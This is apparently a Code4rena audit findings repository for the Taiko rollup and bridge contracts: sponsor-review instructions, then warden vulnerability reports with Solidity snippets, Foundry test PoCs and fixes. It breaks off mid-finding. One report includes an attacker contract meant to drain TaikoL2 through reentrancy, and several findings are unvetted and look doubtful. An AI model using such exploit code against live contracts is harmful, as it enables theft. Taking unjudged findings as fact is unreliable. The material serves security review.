
2024-03-taiko-findings's Introduction

Taiko Audit

Unless otherwise discussed, this repo will be made public after audit completion, sponsor review, judging, and issue mitigation window.

Contributors to this repo: prior to report publication, please review the Agreements & Disclosures issue.


Audit findings are submitted to this repo

Sponsors have three critical tasks in the audit process:

  1. Respond to issues.
  2. Weigh in on severity.
  3. Share your mitigation of findings.

Let's walk through each of these.

High and Medium Risk Issues

Wardens submit issues without seeing each other's submissions, so keep in mind that there will always be findings that are duplicates. For all issues labeled 3 (High Risk) or 2 (Medium Risk), these have been pre-sorted for you so that there is only one primary issue open per unique finding. All duplicates have been labeled duplicate, linked to a primary issue, and closed.

Judges have the ultimate discretion in determining validity and severity of issues, as well as whether/how issues are considered duplicates. However, sponsor input is a significant criterion.

Respond to issues

For each High or Medium risk finding that appears in the dropdown at the top of the chrome extension, please label as one of these:

  • sponsor confirmed, meaning: "Yes, this is a problem and we intend to fix it."
  • sponsor disputed, meaning either: "We cannot duplicate this issue" or "We disagree that this is an issue at all."
  • sponsor acknowledged, meaning: "Yes, technically the issue is correct, but we are not going to resolve it for xyz reasons."

Add any necessary comments explaining your rationale for your evaluation of the issue.

Note that when the repo is public, after all issues are mitigated, wardens will read these comments; they may also be included in your C4 audit report.

Weigh in on severity

If you believe a finding is technically correct but disagree with the listed severity, select the disagree with severity option, along with a comment indicating your reasoning for the judge to review. You may also add questions for the judge in the comments. (Note: even if you disagree with severity, please still choose one of the sponsor confirmed or sponsor acknowledged options as well.)

For a detailed breakdown of severity criteria and how to estimate risk, please refer to the judging criteria in our documentation.

QA reports, Gas reports, and Analyses

All warden submissions in these three categories are submitted as bulk listings of issues and recommendations:

  • QA reports include all low severity and non-critical findings from an individual warden.
  • Gas reports include all gas optimization recommendations from an individual warden.
  • Analyses contain high-level advice and review of the code: the "forest" to individual findings' "trees."

For QA reports, Gas reports, and Analyses, sponsors are not required to weigh in on severity or risk level. We ask that sponsors:

  • Leave a comment for the judge on any reports you consider to be particularly high quality. (These reports will be awarded on a curve.)
  • For QA and Gas reports only: add the sponsor disputed label to any reports that you think should be completely disregarded by the judge, i.e. the report contains no valid findings at all.

Once labelling is complete

When you have finished labelling findings, drop the C4 team a note in your private Discord backroom channel and let us know you've completed the sponsor review process. At this point, we will pass the repo over to the judge to review your feedback while you work on mitigations.

Share your mitigation of findings

Note: this section does not need to be completed in order to finalize judging. You can continue work on mitigations while the judge finalizes their decisions and even beyond that. Ultimately we won't publish the final audit report until you give us the OK.

For each finding you have confirmed, you will want to mitigate the issue before the contest report is made public.

If you are planning a Code4rena mitigation review:

  1. In your own Github repo, create a branch based off of the commit you used for your Code4rena audit, then
  2. Create a separate Pull Request for each High or Medium risk C4 audit finding (e.g. one PR for finding H-01, another for H-02, etc.)
  3. Link the PR to the issue that it resolves within your contest findings repo.

Most C4 mitigation reviews focus exclusively on reviewing mitigations of High and Medium risk findings. Therefore, QA and Gas mitigations should be done in a separate branch. If you want your mitigation review to include QA or Gas-related PRs, please reach out to C4 staff and let’s chat!

If several findings are inextricably related (e.g. two potential exploits of the same underlying issue, etc.), you may create a single PR for the related findings.

If you aren’t planning a mitigation review

  1. Within a repo in your own GitHub organization, create a pull request for each finding.
  2. Link the PR to the issue that it resolves within your contest findings repo.

This will allow for complete transparency in showing the work of mitigating the issues found in the contest. If the issue in question has duplicates, please link to your PR from the open/primary issue.


2024-03-taiko-findings's Issues

refundTo to inaccessible address

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/bridge/Bridge.sol#L294-L295

Vulnerability details

Impact

processMessage() is called on the destination chain, while the signal is sent on the source chain. The code uses refundTo == msg.sender as a condition. However, the msg.sender address will not be controllable by contracts on L2, so any refund, or the bridged ETH amount in the case of a failed transaction, will be lost.

Proof of Concept

// Refund the processing fee
if (msg.sender == refundTo) { // @audit
    refundTo.sendEther(_message.fee + refundAmount);
} else {
    // If sender is another address, reward it and refund the rest
    msg.sender.sendEther(_message.fee);
    refundTo.sendEther(refundAmount);
}

Tools Used

Manual review

Recommended Mitigation Steps

Specify destOwner in the condition, as sketched below.
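
A minimal sketch of that change, reusing the variable names from the snippet above; _message.destOwner is assumed to be in scope (this reflects the finding's suggestion, not a confirmed fix):

// Refund the processing fee to the message's destOwner instead of an
// L1-derived refundTo address (assumed fix, for illustration only)
if (msg.sender == _message.destOwner) {
    _message.destOwner.sendEther(_message.fee + refundAmount);
} else {
    // If sender is another address, reward it and refund the rest
    msg.sender.sendEther(_message.fee);
    _message.destOwner.sendEther(refundAmount);
}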

Assessed type

Other

Bridge::sendMessage() does not update the message status

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/bridge/Bridge.sol#L115-L152

Vulnerability details

Impact

The sendMessage() function of the bridge does not insert the status into the mapping maintained by the bridge contract. As a result, looking up the message hash in messageStatus returns the default value of 0, which maps to NEW in the status enum.

     mapping(bytes32 msgHash => Status status) public messageStatus;

However, every message submitted to the bridge should have a status record for proper tracking of the messages sent. The current code only works because NEW and the default value 0 happen to be the same.

Proof of Concept

The sendMessage function should mark the msgHash as new as below.

   msgHash_ = hashMessage(message_);
 ===> missing: "messageStatus[msgHash_] = Status.NEW;"
   ISignalService(resolve("signal_service", false)).sendSignal(msgHash_);

Tools Used

Manual review

Recommended Mitigation Steps

   msgHash_ = hashMessage(message_);
   messageStatus[msgHash_] = Status.NEW;
   ISignalService(resolve("signal_service", false)).sendSignal(msgHash_);

Assessed type

Other

GAP variable inconsistency in Bridge.sol

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/bridge/IBridge.sol#L60-L64
https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/bridge/Bridge.sol#L29-L48

Vulnerability details

Impact

Possible storage collision
Impact - High
Chances - Low to medium
Severity - medium

Proof of Concept

The __gap variable is used in upgradeable contracts to ensure that any new variable added in a parent or child contract does not collide with a previously used storage slot. Hence its size must be clearly defined, which the Taiko contracts do except in Bridge.sol: in that file they have assumed that the Context struct uses 3 slots, but it only uses 2 slots.

    struct Context {
        bytes32 msgHash; // Message hash.
        address from; // 20 bytes
        uint64 srcChainId; ///@audit 8 bytes , 20 + 8 bytes will be packed in 1 slot
    }

This wrong assumption has led to an incorrect size being allotted to the __gap array, which should be 44 instead of 43.

It can also be verified by running

forge inspect contracts/bridge/Bridge.sol:Bridge storage --pretty

Tools Used

Manual Review

Recommended Mitigation Steps

    /// @notice The next message ID.
    /// @dev Slot 1.
    uint128 public nextMessageId;

    /// @notice Mapping to store the status of a message from its hash.
    /// @dev Slot 2.
    mapping(bytes32 msgHash => Status status) public messageStatus;

--    /// @dev Slots 3, 4, and 5.
++    /// @audit Slots 3,4
    Context private __ctx;

    /// @notice Mapping to store banned addresses.
--    /// @dev Slot 6.
++    /// @audit slot 5
    mapping(address addr => bool banned) public addressBanned;

    /// @notice Mapping to store the proof receipt of a message from its hash.
--    /// @dev Slot 7.
++    /// @audit slot 6
    mapping(bytes32 msgHash => ProofReceipt receipt) public proofReceipt;

--    uint256[43] private __gap;
++    uint256[44] private __gap;

Some real-world hacks and previous findings explain why a consistent gap size is important: the Audius hack, finding 1, finding 2.

Assessed type

Upgradable

Method ERC20Vault::changeBridgedToken() will never be executed

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/tokenvault/ERC20Vault.sol#L158

Vulnerability details

Impact

It is impossible to remap a canonical token to another bridged token.

Detailed description

It is not possible to create a bridge token without instantiating the CanonicalERC20 structure and mapping them together, since this happens in one place, in the _deployBridgedToken method:

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/tokenvault/ERC20Vault.sol#L407

The mappings are set here:

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/tokenvault/ERC20Vault.sol#L422-L423

However, in the method ERC20Vault::changeBridgedToken(), in the line

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/tokenvault/ERC20Vault.sol#L158

there is a check on bridgedToCanonical[_btokenNew].addr != address(0), requiring that no canonical token already exists in the bridgedToCanonical mapping for the new bridged token. Since every bridged token is created through _deployBridgedToken(), which populates that mapping, execution of the method ERC20Vault::changeBridgedToken() will always revert.

Proof of Concept

You can use the protocol's own test suite to run this PoC.

Copy and paste the snippet below into the ERC20Vault.t.sol test file.
Run it with forge test -vv --match-test test_changeBridgedToken_Failed

function test_changeBridgedToken_Failed() public {
    // All the code below, up to the line vm.prank(Carol), is needed
    // to create two pairs of canonical and bridged tokens

    vm.chainId(destChainId);        
    destChainIdBridge.setERC20Vault(address(destChainIdERC20Vault));

    // Create first canonical token
    FreeMintERC20 erc20x1 = new FreeMintERC20("ERC20X", "ERC20X");
    ERC20Vault.CanonicalERC20 memory ctoken1 = ERC20Vault.CanonicalERC20({
        chainId: srcChainId,
        addr: address(erc20x1),
        decimals: erc20x1.decimals(),
        symbol: erc20x1.symbol(),
        name: erc20x1.name()
    });

    // Create first bridge token
    destChainIdBridge.sendReceiveERC20ToERC20Vault(
        ctoken1,
        Alice,
        Bob,
        1,
        bytes32(0),
        address(erc20Vault),
        srcChainId,
        0.1 ether
    );

    // Get address of the first bridge token
    address btoken1 = destChainIdERC20Vault.canonicalToBridged(ctoken1.chainId, ctoken1.addr);

    // Create second canonical token
    FreeMintERC20 erc20x2 = new FreeMintERC20("ERC20X", "ERC20X");
    ERC20Vault.CanonicalERC20 memory ctoken2 = ERC20Vault.CanonicalERC20({
        chainId: srcChainId,
        addr: address(erc20x2),
        decimals: erc20x2.decimals(),
        symbol: erc20x2.symbol(),
        name: erc20x2.name()
    });

    // Create second bridge token
    destChainIdBridge.sendReceiveERC20ToERC20Vault(
        ctoken2,
        Alice,
        Bob,
        1,
        bytes32(0),
        address(erc20Vault),
        srcChainId,
        0.1 ether
    );

    // Get address of the second bridge token
    address btoken2 = destChainIdERC20Vault.canonicalToBridged(ctoken2.chainId, ctoken2.addr);

    vm.prank(Carol);
    vm.expectRevert(ERC20Vault.VAULT_INVALID_NEW_BTOKEN.selector);
    
    destChainIdERC20Vault.changeBridgedToken(ctoken1, btoken2);
}

Tools Used

Manual review, Foundry

Recommended Mitigation Steps

I would recommend removing the check bridgedToCanonical[_btokenNew].addr != address(0) (see the sketch below).
However, this method has more errors, like this one:

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/tokenvault/ERC20Vault.sol#L180

and they have to be fixed.
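
A diff-style sketch of the first suggested change; the exact surrounding condition inside changeBridgedToken() is assumed rather than quoted from the contract:

-    if (_btokenNew == address(0) || bridgedToCanonical[_btokenNew].addr != address(0)) {
+    if (_btokenNew == address(0)) {
         revert VAULT_INVALID_NEW_BTOKEN();
     }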

Assessed type

Invalid Validation

`block.number` means different things on different L2s

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/L1/hooks/AssignmentHook.sol#L86-L86
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/L1/libs/LibProposing.sol#L122-L122
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L1/libs/LibProposing.sol#L131-L131
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L1/libs/LibProposing.sol#L204-L204
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L1/libs/LibProposing.sol#L220-L220
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L1/libs/LibVerifying.sol#L57-L57
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L2/TaikoL2.sol#L86-L86
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L2/TaikoL2.sol#L88-L88
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L2/TaikoL2.sol#L90-L90
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L2/TaikoL2.sol#L97-L97
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L2/TaikoL2.sol#L118-L118
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L2/TaikoL2.sol#L127-L127
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L2/TaikoL2.sol#L201-L201
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L2/TaikoL2.sol#L202-L202

Vulnerability details

Impact

On Optimism, block.number is the L2 block number, but on Arbitrum, it's the L1 block number, and ArbSys(address(100)).arbBlockNumber() must be used. Furthermore, L2 blocks often occur much more frequently than L1 blocks (and may even occur on a per-transaction basis), so using block numbers for timing results in inconsistencies, especially when voting is involved across multiple chains.

Proof of Concept

File: /contracts/L1/hooks/AssignmentHook.sol

86:                 || assignment.maxProposedIn != 0 && block.number > assignment.maxProposedIn


File: /contracts/L1/libs/LibProposing.sol

122:                 l1Hash: blockhash(block.number - 1),

131:                 l1Height: uint64(block.number - 1),

204:         meta_.difficulty = keccak256(abi.encodePacked(block.prevrandao, b.numBlocks, block.number));

220:             proposedIn: uint64(block.number),


File: /contracts/L1/libs/LibVerifying.sol

57:         _state.slotA.genesisHeight = uint64(block.number);


File: /contracts/L2/TaikoL2.sol

86:         if (block.number == 0) {

88:         } else if (block.number == 1) {

90:             uint256 parentHeight = block.number - 1;

97:         (publicInputHash,) = _calcPublicInputHash(block.number);

118:                 || (block.number != 1 && _parentGasUsed == 0)

127:             parentId = block.number - 1;

201:         if (_blockId >= block.number) return 0;

202:         if (_blockId + 256 >= block.number) return blockhash(_blockId);


Recommended Mitigation Steps

As of version 4.9, OpenZeppelin has modified their governor code to use a clock rather than block numbers, to avoid these sorts of issues, but this still requires that the project implement a clock for each L2.
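
A minimal sketch of a timestamp-based clock in the spirit of that change (ERC-6372); this is an illustrative addition, not existing Taiko code:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;

/// @dev Hypothetical mixin: key timing off the timestamp, which means the
/// same thing on every chain, instead of block.number.
abstract contract TimestampClock {
    /// @dev ERC-6372 clock: seconds since the Unix epoch.
    function clock() public view virtual returns (uint48) {
        return uint48(block.timestamp);
    }

    /// @dev ERC-6372 machine-readable description of the clock.
    function CLOCK_MODE() public pure virtual returns (string memory) {
        return "mode=timestamp";
    }
}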

Assessed type

Other

QA Report

See the markdown file with the details of this report here.

Return values for transfer and transferFrom are not checked in LibProving::_overrideWithHigherProof() function

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L1/libs/LibProving.sol#L350-L398

Vulnerability details

Impact

A call to transfer/transferFrom without checking the result is vulnerable to incorrect accounting. If insufficient tokens are present, no revert occurs, but a result of "false" is returned, so it is important to check this. If you don't, you could mint tokens without having received sufficient tokens to do so, and you could lose funds.

It is also a best practice to check this.

Proof of Concept

Refer to the code snippet below; there are a number of occasions where the return values of transfer and transferFrom are not checked.

function _overrideWithHigherProof(
        TaikoData.TransitionState storage _ts,
        TaikoData.Transition memory _tran,
        TaikoData.TierProof memory _proof,
        ITierProvider.Tier memory _tier,
        IERC20 _tko,
        bool _sameTransition
    )
        private
    {
        // Higher tier proof overwriting lower tier proof
        uint256 reward;

        if (_ts.contester != address(0)) {
            if (_sameTransition) {
                // The contested transition is proven to be valid, contestor loses the game
                reward = _ts.contestBond >> 2;
                _tko.transfer(_ts.prover, _ts.validityBond + reward);
            } else {
                // The contested transition is proven to be invalid, contestor wins the game
                reward = _ts.validityBond >> 2;
                _tko.transfer(_ts.contester, _ts.contestBond + reward);
            }
        } else {
            if (_sameTransition) revert L1_ALREADY_PROVED();
            // Contest the existing transition and prove it to be invalid
            reward = _ts.validityBond >> 1;
            _ts.contestations += 1;
        }

        unchecked {
            if (reward > _tier.validityBond) {
                _tko.transfer(msg.sender, reward - _tier.validityBond);
            } else {
                _tko.transferFrom(msg.sender, address(this), _tier.validityBond - reward);
            }
        }

        _ts.validityBond = _tier.validityBond;
        _ts.contestBond = 1; // to save gas
        _ts.contester = address(0);
        _ts.prover = msg.sender;
        _ts.tier = _proof.tier;

        if (!_sameTransition) {
            _ts.blockHash = _tran.blockHash;
            _ts.stateRoot = _tran.stateRoot;
        }
    }

Tools Used

Manual review

Recommended Mitigation Steps

Check the return value of each transfer and transferFrom call and revert in case the call returns false, as sketched below.
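
One possible fix (a sketch, not the project's confirmed mitigation) is to route the calls through OpenZeppelin's SafeERC20 wrappers, which revert whenever a token returns false or the transfer otherwise fails:

+   import "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

+   using SafeERC20 for IERC20;

    unchecked {
        if (reward > _tier.validityBond) {
-           _tko.transfer(msg.sender, reward - _tier.validityBond);
+           _tko.safeTransfer(msg.sender, reward - _tier.validityBond);
        } else {
-           _tko.transferFrom(msg.sender, address(this), _tier.validityBond - reward);
+           _tko.safeTransferFrom(msg.sender, address(this), _tier.validityBond - reward);
        }
    }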

Assessed type

Token-Transfer

Possible Misinterpretation of Token Origins

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/tokenvault/BridgedERC1155.sol#L121-L123

Vulnerability details

Impact

The potential misinterpretation of token origins due to the discrepancy between the inclusion of the source chain ID in the token name but not in the symbol could lead to confusion among users and applications relying on symbol-based identification of tokens.

Proof of Concept

In the provided contract, the name() function retrieves the name of the bridged token by calling LibBridgedToken.buildName(__name, srcChainId), where both the __name and srcChainId parameters are passed. This indicates that the name includes information about the source chain ID, allowing for differentiation of tokens from various chains.

However, the symbol() function simply calls LibBridgedToken.buildSymbol(__symbol) without passing the srcChainId parameter. As a result, the symbol does not incorporate information about the source chain ID.

This design discrepancy could lead to a misinterpretation of token origins. For instance, if tokens from different chains share the same symbol but have different source chain IDs, users relying solely on the symbol might incorrectly assume that tokens with the same symbol originate from the same chain.

Tools Used

Manual

Recommended Mitigation Steps

Consider modifying the symbol() function to include the source chain ID. By passing the srcChainId parameter alongside __symbol to LibBridgedToken.buildSymbol(), the symbol can reflect both the token's identity and its originating chain.
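
A minimal sketch of that change, assuming a hypothetical LibBridgedToken.buildSymbol overload that also accepts the chain ID (the current library function takes only the symbol):

function symbol() public view returns (string memory) {
    // Hypothetical overload: append the source chain ID to the symbol,
    // mirroring what buildName() already does for the token name.
    return LibBridgedToken.buildSymbol(__symbol, srcChainId);
}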

Assessed type

Context

Missing Pause check in TaikoToken::_beforeTokenTransfer()

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/b6885955903c4ec6a0d72ebb79b124c6d0a1002b/packages/protocol/contracts/L1/TaikoToken.sol#L83

Vulnerability details

Summary

Throughout the protocol, whenNotPaused modifier is used in the _beforeTokenTransfer() function to ensure that token transfers are only allowed when the contract is not paused. The rationale behind this is to maintain the integrity and security of the contract during periods when it might be necessary to temporarily halt all token transfers.

However, in TaikoToken contract, this modifier is not used on _beforeTokenTransfer().

Proof of Concept

This modifier is used throughout the protocol in the other contracts that implement _beforeTokenTransfer().

However, in TaikoToken::_beforeTokenTransfer(), it is omitted:

    function _beforeTokenTransfer(
        address _from,
        address _to,
        uint256 _amount
    )
        internal
        override(ERC20Upgradeable, ERC20SnapshotUpgradeable)
    {
        super._beforeTokenTransfer(_from, _to, _amount);
    }

Impact

In case where the governance wants to stop all activity, they still can't stop transferring tokens.

Here is an example where stopping transferring tokens was actually very helpful: https://mobile.twitter.com/flashfish0x/status/1466369783016869892

Tools Used

Manual Review

Recommended Mitigation Steps

Add the whenNotPaused modifier to _beforeTokenTransfer():

    function _beforeTokenTransfer(
        address _from,
        address _to,
        uint256 _amount
    )
        internal
        whenNotPaused
        override(ERC20Upgradeable, ERC20SnapshotUpgradeable)
    {
        super._beforeTokenTransfer(_from, _to, _amount);
    }

Assessed type

Other

QA Report

See the markdown file with the details of this report here.

Analysis

See the markdown file with the details of this report here.

L2 Coinbase receives lower eth deposit fee in a future block

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/L1/libs/LibDepositing.sol#L109

Vulnerability details

Impact

The fee collected from ETH deposits is received by the L2 coinbase later than possible and is also lower than the maximum.

Proof of Concept

When processing ETH deposits in LibDepositing.processDeposits(), the fee collected for the L2 coinbase from deposits is stored in the ethDeposits array to be processed in the future (LibDepositing.sol#L109):

// This is the fee deposit
_state.ethDeposits[_state.slotA.numEthDeposits % _config.ethDepositRingBufferSize] =
    _encodeEthDeposit(_feeRecipient, totalFee);

This deposit is processed in future blocks as the current block only processes deposits until some index before numEthDeposits (considering ring buffer). This has two effects:

  • This delays the rewards the coinbase can get. If this fee were processed in the same block, the coinbase would receive the fee earlier, which also removes the dependency on a future block's basefee. This can become important since the market is inherently volatile, or when the coinbase needs the fee immediately for stronger incentivization.
  • Also, this creates a cycle: in the future block where this fee is processed, the proposer of that block takes a fee from it (LibDepositing.sol#L101):
uint96 _fee = deposits_[i].amount > fee ? fee : deposits_[i].amount;

...
unchecked {
    deposits_[i].amount -= _fee;
    totalFee += _fee;

A portion of this new totalFee again goes to the block even more into the future, creating a cycle.

Thus, a portion of the fee collected keeps going to future block proposers when it should have gone to the current block proposer.

Recommended Mitigation Steps

Process fee deposit in the same block by adding it to the deposits_ array returned by the function instead of adding it to ethDeposits storage array.

Assessed type

ETH-Transfer

Double Withdrawal Exploit: Reentrancy Vulnerability in TaikoL2.sol

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L2/TaikoL2.sol#L161-L178

Vulnerability details

Impact

  1. Double Withdrawals: The primary impact of this vulnerability is that it allows an attacker to double the withdrawals from the TaikoL2 contract. This is achieved by exploiting the reentrancy vulnerability in the withdraw function, which allows the attacker to recursively call the withdraw function before the state changes are made, leading to multiple withdrawals.

  2. Loss of Funds: For the TaikoL2 contract, this vulnerability could lead to a significant loss of funds. If an attacker can exploit this vulnerability, they could potentially drain the contract's balance, affecting the contract's functionality and the trust of users in the contract.

Proof of Concept

To demonstrate a Proof of Concept (POC) for the reentrancy vulnerability in the withdraw function of TaikoL2.sol, we'll create a malicious contract that exploits this vulnerability. This POC will illustrate how an attacker could potentially double withdrawals by calling the withdraw function in the fallback function of their malicious contract.

Step 1: Create the Malicious Contract

First, we'll create a malicious contract that will exploit the reentrancy vulnerability in the withdraw function. This contract will have a fallback function that calls the withdraw function of TaikoL2.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;

import "./TaikoL2.sol";

contract MaliciousContract {
    TaikoL2 public taikoL2;
    address payable public attacker;

    constructor(TaikoL2 _taikoL2) {
        taikoL2 = _taikoL2;
        attacker = payable(msg.sender);
    }

    // Fallback function to exploit reentrancy
    fallback() external payable {
        if (address(taikoL2).balance >= msg.value) {
            taikoL2.withdraw{value: msg.value}(attacker);
        }
    }

    // Function to initiate the attack
    function attack() external payable {
        require(msg.value > 0, "Must send some Ether");
        taikoL2.withdraw{value: msg.value}(address(this));
    }

    // Function to withdraw the stolen Ether
    function withdraw() external {
        require(msg.sender == attacker, "Only the attacker can withdraw");
        payable(attacker).transfer(address(this).balance);
    }
}

Step 2: Deploy and Execute the Attack

  1. Deploy TaikoL2 and MaliciousContract: Deploy the TaikoL2 contract and the MaliciousContract with the address of the deployed TaikoL2 contract as a constructor argument.

  2. Initiate the Attack: Call the attack function of the MaliciousContract with some Ether. This will trigger the withdraw function of TaikoL2, which in turn will call the fallback function of the MaliciousContract.

  3. Observe the Reentrancy: The fallback function of the MaliciousContract will again call the withdraw function of TaikoL2, potentially leading to double withdrawals.

Recommended Mitigation Steps

To mitigate this reentrancy vulnerability, the withdraw function in TaikoL2.sol should use the Checks-Effects-Interactions pattern and consider using the nonReentrant modifier from OpenZeppelin's ReentrancyGuard contract. This ensures that all state changes are made before calling external contracts, preventing reentrancy attacks.

import "@openzeppelin/contracts/security/ReentrancyGuard.sol";

contract TaikoL2 is CrossChainOwned, ReentrancyGuard {
    // Existing code...

    function withdraw(address _token, address _to)
        external
        onlyFromOwnerOrNamed("withdrawer")
        nonReentrant
        whenNotPaused
    {
        // Implementation...
    }
}

By adding the nonReentrant modifier to the withdraw function, we ensure that the function cannot be re-entered while it is still executing, thus mitigating the reentrancy vulnerability.

Assessed type

Reentrancy

Function Always Returns False

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L2/TaikoL2.sol#L220

Vulnerability details

Impact

The skipFeeCheck() function always returns false, which makes the returned value redundant. Although the returned value is not actually used by the caller, it is better to refactor it for readability.

Recommended Mitigation Steps

We recommend correcting the return value.

Assessed type

Context

Bridge::sendMessage() ignores the ban address list from owner.

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/bridge/Bridge.sol#L115-L152
https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/bridge/Bridge.sol#L101-L113

Vulnerability details

Impact

The Bridge contract's sendMessage function does not restrict message requests from banned addresses maintained by the bridge watchdog.

In the current implementation, there is no check that the source and destination addresses are on the ban list.

Since the sendMessage() function is the origination point of communication between the two chains over the bridge, a banned address should be rejected at the time the party submits the request on one of the chains.

As a result, parties are able to submit requests even for addresses on the ban list, which will only revert during a later stage of processing.

Proof of Concept

The ban list mapping is maintained as below:

     function banAddress(
        address _addr,
        bool _ban
    )
        external
        onlyFromOwnerOrNamed("bridge_watchdog")
        nonReentrant
    {
        if (addressBanned[_addr] == _ban) revert B_INVALID_STATUS();
        addressBanned[_addr] = _ban;
        emit AddressBanned(_addr, _ban);
    }

The sendMessage function does not consult the ban mapping when accepting a message from the caller.

Tools Used

Manual review.

Recommended Mitigation Steps

Check the source and destination addresses before accepting the message in the sendMessage() function.

if (addressBanned[_message.srcOwner] || addressBanned[_message.destOwner]) {
    revert B_INVALID_USER();
}

Assessed type

Invalid Validation

Wrong importing of library will bypass `isContract` check.

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/bridge/Bridge.sol#L4
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/libs/LibAddress.sol#L4

Vulnerability details

Impact

Importing the wrong library will easily bypass the isContract check in the Bridge contract and LibAddress.

Proof of Concept

The Bridge._invokeMessageCall function will always bypass the check used to ensure that the address is actually a contract, due to the wrong library import; as a result, the check in this function passes even if the address is an EOA.

Bridge.sol#L493
if (
            _message.data.length >= 4 // msg can be empty
                && bytes4(_message.data) != IMessageInvocable.onMessageInvocation.selector
                && _message.to.isContract()
        )

Here, the check _message.to.isContract(), which ensures the to address is a contract, will always be bypassed, and the same check will always be bypassed in the LibAddress library for the same reason: it imports the wrong library.

LibAddress.sol#L54
if (!Address.isContract(_addr)) return false;

LibAddress.sol#L70
if (Address.isContract(_addr))

For this reason, all calls passed through the above-mentioned library and contract could execute for an EOA rather than a contract.

Tools Used

manual

Recommended Mitigation Steps

Make the changes as below,

LibAddress.sol#L4
-   import "@openzeppelin/contracts/utils/Address.sol";
+   import "@openzeppelin/contracts-upgradeable/utils/AddressUpgradeable.sol";

LibAddress.sol#L54
-   if (!Address.isContract(_addr)) return false;
+   if (!AddressUpgradeable.isContract(_addr)) return false;

LibAddress.sol#L70
-   if (Address.isContract(_addr))
+   if (AddressUpgradeable.isContract(_addr))

Bridge.sol#L4
-   import "@openzeppelin/contracts/utils/Address.sol";
+   import "@openzeppelin/contracts-upgradeable/utils/AddressUpgradeable.sol";

Bridge.sol#L17
-   using Address for address;
+   using AddressUpgradeable for address;

Assessed type

Error

Suspended messages can still be retried

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/bridge/Bridge.sol#L82-L95

Vulnerability details

Description

The owner or the bridge watchdog can suspend multiple messages by calling suspendMessages:

    function suspendMessages(
        bytes32[] calldata _msgHashes,
        bool _suspend
    )
        external
        onlyFromOwnerOrNamed("bridge_watchdog")
    {
        uint64 _timestamp = _suspend ? type(uint64).max : uint64(block.timestamp);
        for (uint256 i; i < _msgHashes.length; ++i) {
            bytes32 msgHash = _msgHashes[i];
            proofReceipt[msgHash].receivedAt = _timestamp;
            emit MessageSuspended(msgHash, _suspend);
        }
    }

receivedAt gets set to type(uint64).max, which results in the following functions reverting:

  • recallMessage
  • processMessage

In both these functions, when a message is suspended, this happens:

  • This bool gets set to true because receivedAt is type(uint64).max
        bool isMessageProven = receivedAt != 0;
  • Since isMessageProven is true, the next if-statement does not get executed:
        if (!isMessageProven) {
  • Since receivedAt is set to type(uint64).max, this next if-statement does not get executed:
        if (block.timestamp >= invocationDelay + receivedAt) {
  • Since isMessageProven is true, this else-if-statement does not get executed:
        } else if (!isMessageProven) {
  • This will always lead us to this last else-statement, causing these functions to revert:
        } else {
            revert B_INVOCATION_TOO_EARLY();
        }

This demonstrates that it should not be possible to interact with suspended messages.

However, this is not the case for suspended retriable messages.
Consider the following:

  • message(1) is RETRIABLE
  • message(1) gets suspended by the bridge watchdog due to suspicious activity
  • However, it is still possible to retryMessage since nothing checks if receivedAt is set to type(uint64).max:
    function retryMessage(
        Message calldata _message,
        bool _isLastAttempt
    )
        external
        nonReentrant
        whenNotPaused
        sameChain(_message.destChainId)
    {
        if (_message.gasLimit == 0 || _isLastAttempt) {
            if (msg.sender != _message.destOwner) revert B_PERMISSION_DENIED();
        }
        bytes32 msgHash = hashMessage(_message);
        if (messageStatus[msgHash] != Status.RETRIABLE) {
